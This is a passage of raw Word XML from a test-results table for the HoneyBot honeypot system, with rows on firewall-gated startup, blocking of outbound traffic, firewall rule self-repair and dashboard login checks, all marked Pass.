              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeypot start order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">firewall health check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeypots wait for the firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Started only after the firewall was healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Network isolation from honeybot_ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1.1.1.1:80, 8.8.8.8:53, 192.168.1.1:22, db:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">External blocked, internal reachable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 blocked, db reachable; DROP counter 0 → 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Firewall self-repair (E5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">delete one rule, run ensure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule re-applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5 rules restored; flush removes only HoneyBot rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dashboard login (E4, E6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">no / wrong / correct password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">401 / 401 / 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">401 / 401 / 200; bcrypt hash stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API not published</w:t>
            </w:r>
